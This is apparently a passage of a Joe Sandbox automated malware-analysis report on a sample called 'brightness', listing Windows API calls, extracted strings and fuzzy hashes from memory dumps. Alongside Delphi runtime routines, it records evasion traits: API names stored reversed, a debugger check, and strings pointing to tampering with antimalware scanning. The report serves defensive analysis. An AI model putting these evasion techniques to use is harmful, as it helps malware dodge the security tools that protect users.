                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                          • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                                                                          • Instruction ID: 1e8fe1f2256b32fdd7470116084bf0e4c16e77ab6df944c7c2b130f40ca34d6d
                                                                                                                                                                          • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                                                                          • Instruction Fuzzy Hash: BCD05EA631E2642EA220915A2DC4EBB5AFDCAC57A1F04843EF688C6281D2008C0596F1
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 481472006-0
                                                                                                                                                                          • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                                                                                          • Instruction ID: f9228cf7ae809c972aa4b921f9dde4bc10fb7bb0f896420215c4036771886c98
                                                                                                                                                                          • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                                                                                          • Instruction Fuzzy Hash: D9A011008088200A8A803B280C0223A3088A880B20FC80F80A8F8882E0EE2E02B080E3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0290D21D
                                                                                                                                                                            • Part of subcall function 0290D1E8: GetProcAddress.KERNEL32(00000000), ref: 0290D201
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                          • API String ID: 1646373207-1918263038
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02916E5E
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02916E6F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02916E7F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02916E8F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02916E9F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02916EAF
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02916EBF
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                          • API String ID: 667068680-2233174745
                                                                                                                                                                          APIs
                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029028CE
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message
                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                          • API String ID: 2030045667-32948583
                                                                                                                                                                          Strings
                                                                                                                                                                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02902849
                                                                                                                                                                          • The unexpected small block leaks are:, xrefs: 02902707
                                                                                                                                                                          • bytes: , xrefs: 0290275D
                                                                                                                                                                          • An unexpected memory leak has occurred. , xrefs: 02902690
                                                                                                                                                                          • , xrefs: 02902814
                                                                                                                                                                          • 7, xrefs: 029026A1
                                                                                                                                                                          • Unexpected Memory Leak, xrefs: 029028C0
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                          • API String ID: 0-2723507874
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,0290C00B,?,?,00000000,00000000), ref: 0290BD76
                                                                                                                                                                            • Part of subcall function 0290A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A762
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0291AE38
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0291AE4F
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0291AEE3
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000002), ref: 0291AEEF
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 0291AF03
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Read$HandleModule
                                                                                                                                                                          • String ID: KernelBase$LoadLibraryExA
                                                                                                                                                                          • API String ID: 2226866862-113032527
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?,029617C8,?,?,0292E7A8,0290655D,0292D30D), ref: 02904365
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?,029617C8,?,?,0292E7A8,0290655D,0292D30D), ref: 0290436B
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,029043B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?,029617C8), ref: 02904380
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,029043B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?), ref: 02904386
                                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029043A4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0290ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD9
                                                                                                                                                                            • Part of subcall function 0290ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACFD
                                                                                                                                                                            • Part of subcall function 0290ACBC: GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD18
                                                                                                                                                                            • Part of subcall function 0290ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADAE
                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 0290AE7B
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0290AE98
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AE9E
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,0290AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AEB3
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,0290AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AEB9
                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0290AEDB
                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0290AEF1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 185507032-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0290E5A5
                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0290E5C1
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0290E5FA
                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0290E677
                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0290E690
                                                                                                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 0290E6C5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 351091851-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0290358A
                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029035D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029035BD
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,029035E0,00000000,?,00000004,00000000,029035D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029035D3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: Kernel32$sserddAcorPteG
                                                                                                                                                                          • API String ID: 667068680-1372893251
                                                                                                                                                                          • Opcode ID: 2861626efa1d2682bf18ed6cb77b60c4ee1e45a8390ac19ec517398c94af87ce
                                                                                                                                                                          • Instruction ID: ed100110e4a4ba152137df0b6448eb56eab3f7ec192cfa396681f844e04b9c50
                                                                                                                                                                          • Opcode Fuzzy Hash: 2861626efa1d2682bf18ed6cb77b60c4ee1e45a8390ac19ec517398c94af87ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 86016275A4430CAFEB05EFA5DC95EAE77EEFBC9B10F514864F900D7680D770A9109A10
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0290AA67,?,?,00000000), ref: 0290A9E8
                                                                                                                                                                            • Part of subcall function 0290A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A762
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0290AA67,?,?,00000000), ref: 0290AA18
                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 0290AA23
                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0290AA67,?,?,00000000), ref: 0290AA41
                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 0290AA4C
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4102113445-0
                                                                                                                                                                          • Opcode ID: e14e993b141b04f0e8ffb90aa57c1d3bf06a7ab512d3d2e85918526129f95dce
                                                                                                                                                                          • Instruction ID: b8546bfa202e89d9dc33977e5960c85ad7eff7986e63bfeda4b138bebf7f0fe5
                                                                                                                                                                          • Opcode Fuzzy Hash: e14e993b141b04f0e8ffb90aa57c1d3bf06a7ab512d3d2e85918526129f95dce
                                                                                                                                                                          • Instruction Fuzzy Hash: E601A23564034C6FF701A6B5CDD2B6E739EDBC6B20F910160F710E6AC0D6649E109AA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0290AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0290AAAF
                                                                                                                                                                            • Part of subcall function 0290A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A762
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                          • String ID: eeee$ggg$yyyy
                                                                                                                                                                          • API String ID: 4232894706-1253427255
                                                                                                                                                                          • Opcode ID: 7494f12883e96198ebf3cb9e60f5f3fac1096a80f0d450c41515345dfeb6caf8
                                                                                                                                                                          • Instruction ID: 2a228821d8f7b609f3d826efc405f444e39c3245faaf612ad490d4b3762df4e0
                                                                                                                                                                          • Opcode Fuzzy Hash: 7494f12883e96198ebf3cb9e60f5f3fac1096a80f0d450c41515345dfeb6caf8
                                                                                                                                                                          • Instruction Fuzzy Hash: A741D17170432D4FD711ABB988C07BEB3EBDBC5300B515929D762C73C4EA68ED468AA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc
                                                                                                                                                                          • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                                                          • API String ID: 1883125708-1952140341
                                                                                                                                                                          • Opcode ID: 2c99438aa3baebe399a679eb71500dbb97fbd2143b9caedcacb5478af850daf2
                                                                                                                                                                          • Instruction ID: c05d33086018fbe4b533f46c015b500da1622b74a05d99d31c6b5fc3f5b7d647
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c99438aa3baebe399a679eb71500dbb97fbd2143b9caedcacb5478af850daf2
                                                                                                                                                                          • Instruction Fuzzy Hash: 20F06D34A4430CAFF700EBA5DC85EAE77EDFB8AB407910964F90093680E730AD10AA64
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,?,0291F3CC,UacInitialize,0296237C,0292B40C,UacScan,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanString), ref: 0291EFCE
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0291EFE0
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                                                          • API String ID: 1646373207-2367923768
                                                                                                                                                                          • Opcode ID: 96c10e6b3022fad54936bccd6aca046042a973026d483549ec77dbc7ffe9d69d
                                                                                                                                                                          • Instruction ID: 7fd4876f7597c2c70a9fa0a30f275a2810274e17087d36473515fee7d821c9d5
                                                                                                                                                                          • Opcode Fuzzy Hash: 96c10e6b3022fad54936bccd6aca046042a973026d483549ec77dbc7ffe9d69d
                                                                                                                                                                          • Instruction Fuzzy Hash: 5FD0126335537C1DB50077F51CC481D028C89C6529B200E30B567D61D2E667C8612110
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0292D10B,00000000,0292D11E), ref: 0290C3FA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0290C40B
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                                                                                          • Opcode ID: 6ec93d1525dc2a67836f627d63d77e645257306e2abf836b06473482e9022e9e
                                                                                                                                                                          • Instruction ID: 368ab65c99eef1795fc212e079b8e00355d4f15b13d49669994ef28c7b221b8d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ec93d1525dc2a67836f627d63d77e645257306e2abf836b06473482e9022e9e
                                                                                                                                                                          • Instruction Fuzzy Hash: B9D0A761E4438D4EF7106FF16CC167A36CCA7C4305F405936E389561C1D77164284F50
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0290E217
                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0290E233
                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0290E2AA
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0290E2D3
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 920484758-0
                                                                                                                                                                          • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                          • Instruction ID: 85567fdf67f5a124e5451f5e5b1241dd1a79f5ea941f8d8d193f31d6b7348fac
                                                                                                                                                                          • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                          • Instruction Fuzzy Hash: 86410775A0122D8FCB65DB98CCD0BC9B3BDEF89214F0045E5E648A7291DA30AF808F60
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD9
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACFD
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD18
                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADAE
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                          • Opcode ID: f175d80e9c355e5fbb8b0e4690b8e120bf12dbbe225fd60bedda6ede56a5748a
                                                                                                                                                                          • Instruction ID: 5abb9037c97eb014dfcd3201c7c9703fbd7740ff49d39712b9669843a64606fe
                                                                                                                                                                          • Opcode Fuzzy Hash: f175d80e9c355e5fbb8b0e4690b8e120bf12dbbe225fd60bedda6ede56a5748a
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C41E771A4035C9FDB21EB68C8C4BDAB7FDAB48310F0440E9A648E7281DB749F948F54
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD9
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACFD
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD18
                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADAE
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                          • Opcode ID: 55a5db16d8cf814405aa77e67bac642ffa9fdb8a62627d078e212c0db1cb6f13
                                                                                                                                                                          • Instruction ID: 26cf4da0a43d0c2bc65a069d8e91f55468f8f1ee3f3b27d1c004b7af35be53b3
                                                                                                                                                                          • Opcode Fuzzy Hash: 55a5db16d8cf814405aa77e67bac642ffa9fdb8a62627d078e212c0db1cb6f13
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E41E871A4035C9FDB21EB68CCC4BDAB7EDAB48311F0440E9A648E7291DB74AE948F54
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7ea450874ef20a40d01b1f2c5a958157cfc3980b768b0ee0c005d1ceb8eaedde
                                                                                                                                                                          • Instruction ID: 1f720b6ab7a97901bd2605cd8b02619704c4b474b202566f73055a4bebd3cb07
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ea450874ef20a40d01b1f2c5a958157cfc3980b768b0ee0c005d1ceb8eaedde
                                                                                                                                                                          • Instruction Fuzzy Hash: 7CA1D3A67106180FD718AA7C9CC43BEB3CADBC5325F18427EE21DCB3D5EB64C9458650
